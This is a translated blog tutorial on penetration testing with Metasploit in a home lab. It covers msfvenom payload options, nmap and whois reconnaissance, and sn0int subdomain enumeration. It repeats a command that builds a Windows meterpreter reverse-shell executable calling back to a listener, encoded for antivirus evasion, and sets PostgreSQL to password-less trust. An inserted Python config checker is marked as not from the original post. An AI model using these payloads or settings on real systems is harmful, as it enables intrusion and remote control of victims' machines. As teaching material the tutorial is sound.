
Software Penetration Testing Based on Metasploit

顾翔
Published 2022-09-23 20:31:26

Windows 2000 Professional

Link: https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm

Extraction code: upsm

Windows Server 2003 Standard x64 Edition

Link: https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb

Extraction code: ngsb

Windows 7 x64

Link: https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o

Extraction code: zp3o

Debian 6(Kali Linux)

Link: https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5

Extraction code: s2i5

Apache, Tomcat, MySQL and vsftpd are installed, together with the accompanying web security testing practice materials.

cd /usr/local/apache-tomcat-8.5.81/bin
./startup.sh
service mysql start

Open a browser and go to 127.0.0.1:8080/sec/

Metasploitable2-Linux (with vsftpd 2.3.4)

Link: https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6

Extraction code: 17g6

After extraction it is a vmx file that can be used directly.

Basic concepts

Communication protocols

ARP

ICMP

TCP

Terminology

Exploit

What the tester uses to attack a system, program or service in order to obtain a result the developer did not intend. Common kinds are memory overflows, web application vulnerability exploitation, and misconfiguration exploits.

Payload

The program we want the attacked system to execute. A reverse shell, for example, establishes a connection back from the target machine to the tester, while a bind shell binds a command-execution channel on the target for the tester's machine to connect to. A payload can also be a program that runs only a limited set of commands on the target machine.

Shellcode

The sequence of instructions used as the payload during an attack; once executed on the target machine it usually provides a shell from which commands can be run.

Module

An MSF module; it consists of a body of code.

Listener

A program on the tester's machine that waits for an incoming connection from the attacked machine.

Encoders

msfencode -l lists the available encoders; the most effective one is x86/shikata_ga_nai.

Metasploit user interfaces

MSF console

# msfconsole
msf6 > help connect

MSF command line

# msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD "…"; run
# msfconsole -r path/xxx.rc

Armitage

Installation

Download Armitage: https://gitlab.com/kalilinux/packages/armitage

Unpack armitage

# cd armitage
# ./package.sh
# cd release
# ll
drwxr-xr-x 2 root root 4096 6月 29 18:40 unix
drwxr-xr-x 2 root root 4096 6月 29 18:40 windows
# cd /etc/postgresql/14/main/
# gedit pg_hba.conf

Comment out all of them:

# "local" is for Unix domain socket connections only
local   all   all                 trust
# IPv4 local connections:
host    all   all   127.0.0.1/32  trust
# IPv6 local connections:
host    all   all   ::1/128       trust

# service postgresql stop
# msfdb reinit
# service postgresql start
# cd /home/jerry/下载/armitage-kali-master/release/unix
# ./armitage
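The pg_hba.conf edit above switches every local connection to trust, so anyone who can reach the socket or the loopback port gets into the msf database as any role with no credential; those are the lines to revert once the lab is done. As an added example (not from the original post), a Python check that parses pg_hba.conf and lists its trust rules, with the file from this step beside the same three rules using the methods a stock Debian PostgreSQL 14 install ships (peer and scram-sha-256 are an assumption here; only CIDR-form addresses are handled).

```python
from typing import List, NamedTuple

class HbaRule(NamedTuple):
    line_no: int
    conn_type: str   # local, host, hostssl, hostnossl, ...
    database: str
    user: str
    address: str     # empty for "local" rules
    method: str      # trust, peer, scram-sha-256, md5, ...

# Constructed sample: the pg_hba.conf the Armitage step above leaves behind.
WEAK_PG_HBA = """\
# "local" is for Unix domain socket connections only
local   all   all                 trust
# IPv4 local connections:
host    all   all   127.0.0.1/32  trust
# IPv6 local connections:
host    all   all   ::1/128       trust
"""

# Constructed sample: the same rules with the methods a stock Debian/Kali
# PostgreSQL 14 install uses (assumption: peer for the socket, scram-sha-256 for TCP).
STOCK_PG_HBA = """\
local   all   all                 peer
host    all   all   127.0.0.1/32  scram-sha-256
host    all   all   ::1/128       scram-sha-256
"""

def parse_pg_hba(text: str) -> List[HbaRule]:
    """Parse the active rules of a pg_hba.conf (comments and blank lines skipped).

    Assumes host-type rules give the address in CIDR form, i.e. in one column;
    the separate "IP netmask" two-column form is not handled here.
    """
    rules: List[HbaRule] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":
            if len(fields) < 4:
                raise ValueError(f"line {line_no}: malformed local rule: {raw!r}")
            conn, db, user, method = fields[:4]
            address = ""
        else:
            if len(fields) < 5:
                raise ValueError(f"line {line_no}: malformed host rule: {raw!r}")
            conn, db, user, address, method = fields[:5]
        rules.append(HbaRule(line_no, conn, db, user, address, method))
    return rules

def trust_rules(text: str) -> List[HbaRule]:
    """Rules whose method is 'trust': they accept any client claiming any role
    without a credential, which is what the lab setup above relies on."""
    return [r for r in parse_pg_hba(text) if r.method == "trust"]
```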

Generating the controlled end and the controlling end
Scanning

Metasploit utility programs

MSF payload generator

Authoring / output languages:

- Python

- C

- Web languages (JavaScript)

# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options    List --payload's standard, advanced and evasion options
    -f, --format          Output format (use --list formats to list)
    -e, --encoder         The encoder to use (use --list encoders to list)
        --service-name    The service name to use when generating a service binary
        --sec-name        The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest        Generate the smallest possible payload using all available encoders
        --encrypt         The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     A key to be used for --encrypt
        --encrypt-iv      An initialization vector for --encrypt
    -a, --arch            The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        The platform for --payload (use --list platforms to list)
    -o, --out             Save the payload to a file
    -b, --bad-chars       Characters to avoid, example: '\x00\xff'
    -n, --nopsled         Prepend a nopsled of [length] size on to the payload
        --pad-nops        Use the nopsled size given by -n as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           The maximum size of the resulting payload
        --encoder-space   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      The number of times to encode the payload
    -c, --add-code        Specify an additional win32 shellcode file to include
    -x, --template        Specify a custom executable file to use as a template
    -k, --keep            Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        Specify a custom variable name to use for certain output formats
    -t, --timeout         The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help            Show this message

MSF encoders

# msfvenom -l encoders

Framework Encoders [--encoder]
==============================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

MSF payloads

# msfvenom -l payloads

MSF NOPs

# msfvenom -l nops
Framework NOPs (11 total)
=========================

    Name             Description
    ----             -----------
    aarch64/simple   Simple NOP generator
    armle/simple     Simple NOP generator
    cmd/generic      Generates harmless padding for command payloads.
    mipsbe/better    Better NOP generator
    php/generic      Generates harmless padding for PHP scripts
    ppc/simple       Simple NOP generator
    sparc/random     SPARC NOP generator
    tty/generic      Generates harmless padding for TTY input
    x64/simple       An x64 single/multi byte NOP instruction generator.
    x86/opty2        Opty2 multi-byte NOP generator
    x86/single_byte  Single-byte NOP generator

MSF platforms

# msfvenom -l platforms


Framework Platforms [--platform]
========================================


    Name
    ----
    aix
    android
    apple_ios
    arista
    brocade
    bsd
    bsdi
    cisco
    firefox
    freebsd
    hardware
    hpux
    irix
    java
    javascript
    juniper
    linux
    mainframe
    mikrotik
    multi
    netbsd
    netware
    nodejs
    openbsd
    osx
    php
    python
    r
    ruby
    solaris
    unifi
    unix
    unknown

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

MSF architectures for --payload and --encoder

# msfvenom -l archs
Framework Architectures [--arch]
========================================


    Name
    ----
    aarch64
    armbe
    armle
    cbea
    cbea64
    cmd
    dalvik
    firefox
    java
    mips
    mips64
    mips64le
    mipsbe
    mipsle
    nodejs
    php
    ppc
    ppc64
    ppc64le
    ppce500v2
    python
    r
    ruby
    sparc
    sparc64
    tty
    x64
    x86
    x86_64
    zarch
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

MSF encryption or encoding types applied to the shellcode

# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
    Name
    ----
    aes256
    base64
    rc4
    xor

MSF file formats

# msfvenom -l formats
Framework Executable Formats [--format]
===============================================
    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war
Framework Transform Formats [--format]
==============================================


    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

Viewing module options

# msfvenom -p moduleName --list-options

For example:

msfvenom -p windows/shell_reverse_tcp --list-options

Nasm shell

The Netwide Assembler (NASM) is an assembler and disassembler for the x86 architecture. It can be used to write 16-bit (8086, 80286, etc.), 32-bit (IA-32) and 64-bit (x86_64) programs, and is considered one of the most popular assemblers on Linux.

NASM was originally developed by Simon Tatham with the assistance of Julian Hall. As of 2016 it is maintained by a small team led by Hans Peter Anvin. It is open-source software released under the simplified (2-clause) BSD License.

cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb 
nasm > jmp esp
00000000  FFE4              jmp esp
nasm >

Metasploit Express & Metasploit Pro

Information gathering

Passive information gathering

Whois

Syntax

msf > whois example.com
msf > whois 192.168.1.100

Example

msf6 > whois 3testing.com
[*] exec: whois 3testing.com
   Domain Name: 3TESTING.COM
   Registry Domain ID: 513017975_DOMAIN_COM-VRSN
   Registrar WHOIS Server: grs-whois.hichina.com
   Registrar URL: http://www.net.cn
   Updated Date: 2017-06-27T15:41:17Z
   Creation Date: 2006-07-09T13:24:36Z
   Registry Expiry Date: 2023-07-09T13:24:36Z
   Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
   Registrar IANA ID: 420
   Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
   Registrar Abuse Contact Phone: +86.95187
   Domain Status: ok https://icann.org/epp#ok
   Name Server: DNS10.HICHINA.COM
   Name Server: DNS9.HICHINA.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
% [whois.apnic.net]
% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html
% Information related to '123.56.0.0 - 123.57.255.255'
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
descr:  Aliyun Computing Co., LTD
descr:  5F, Builing D, the West Lake International Plaza of S&T
descr:  No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country:CN
admin-c:ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c:AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt:IRT-CNNIC-CN
last-modified:  2021-06-16T01:25:33Z
source: APNIC


irt:IRT-CNNIC-CN
address:Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
auth:   # Filtered
remarks:Please note that CNNIC is not an ISP and is not
remarks:empowered to investigate complaints of network abuse.
remarks:Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source: APNIC


role:   ABUSE CNNICCN
address:Beijing, China
country:ZZ
phone:  +000000000
e-mail: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
nic-hdl:AC1601-AP
remarks:Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source: APNIC


person: Li Jia
address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou
country:CN
phone:  +86-0571-85022088
e-mail: jiali.jl@alibaba-inc.com
nic-hdl:ZM1015-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2014-07-30T02:02:01Z
source: APNIC


person: Guoxin Gao
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone:  +86-0571-85022600
fax-no: +86-0571-85022600
e-mail: anti-spam@list.alibaba-inc.com
nic-hdl:ZM875-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2014-07-30T01:56:01Z
source: APNIC


person: security trouble
e-mail: yitian.gaoyt@alibaba-inc.com
address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road
address:Hangzhou, Zhejiang, China
phone:  +86-0571-85022600
country:CN
mnt-by: MAINT-CNNIC-AP
nic-hdl:ZM876-AP
last-modified:  2021-04-13T23:22:33Z
source: APNIC


person: Guowei Pan
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone:  +86-0571-85022088-30763
fax-no: +86-0571-85022600
e-mail: guowei.pangw@alibaba-inc.com
nic-hdl:ZM877-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2013-07-09T01:34:02Z
source: APNIC


% Information related to '123.56.128.0/19AS4837'


route:  123.56.128.0/19
descr:  CNC Group CHINA169 Fujian Province Network
descr:  Addresses from APNIC(YJZXNET)
country:CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
last-modified:  2008-09-04T07:55:26Z
source: APNIC


% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)

netcraft

https://www.netcraft.com/

https://searchdns.netcraft.com/

Maltego

sn0int

Installation
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc
# echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
# sn0int
[sn0int][default] > pkg quickstart
Usage
[sn0int][default] > workspace demo
[+] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com"             : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com"             : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com"             : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com"            : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com"            : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com"            : Adding subdomain "foundation.baidu.com"
[*] "baidu.com"            : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com"            : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com"            : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com"           : Adding subdomain "duke.baidu.com"
[*] "baidu.com"           : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com"           : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com"           : Adding subdomain "vpn.baidu.com"
[*] "baidu.com"           : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com"           : Adding subdomain "trafficsafe.baidu.com"

ZoomEye

nslookup

msf6 > nslookup
set type=mx
example.com

Example

msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 8.8.8.8
Address:8.8.8.8#53
Non-authoritative answer:
Name:   www.3testing.com
Address: 123.56.135.186


msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server:       192.168.0.1
Address:       192.168.0.1#53
Non-authoritative answer:
Name:       www.3testing.com
Address: 123.56.135.186

Google Hacking

Active information gathering

nmap scanning

The most basic scan

#nmap 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:09 CST
Nmap scan report for 192.168.0.106
Host is up (0.0028s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
Scanning for live hosts: -sn
#nmap -sn 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:13 CST
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
Scanning multiple machines
Using IP1 IP2 … IPn
# nmap 192.168.0.106 192.168.0.150 192.168.0.158 192.168.0.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.0017s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.158
Host is up (0.0087s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.160
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)


Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 4 IP addresses (4 hosts up) scanned in 1.08 seconds
Using a range IP1-IP2
# nmap 192.168.0.100-160                                       
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:39 CST
Nmap scan report for 192.168.0.106
Host is up (0.00058s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.151
Host is up (0.016s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
5357/tcp open  wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.158
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.159
Host is up (0.012s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.150
Host is up (0.0000030s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http


Nmap done: 61 IP addresses (5 hosts up) scanned in 4.12 seconds
Using a CIDR block IP/24
# nmap 192.168.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:34 CST
Nmap scan report for 192.168.0.1
Host is up (0.0086s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)


Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.151
Host is up (0.017s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
5357/tcp open  wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.158
Host is up (0.021s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.159
Host is up (0.013s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.161
Host is up (0.00029s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)


Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.18 seconds
Scanning devices with ICMP
ICMP echo (ping-like request/response) scan: -PE
#nmap -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.00018s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
ICMP timestamp response scan: -PP
#nmap -PP 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:55 CST
Nmap scan report for 192.168.0.106
Host is up (0.0021s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
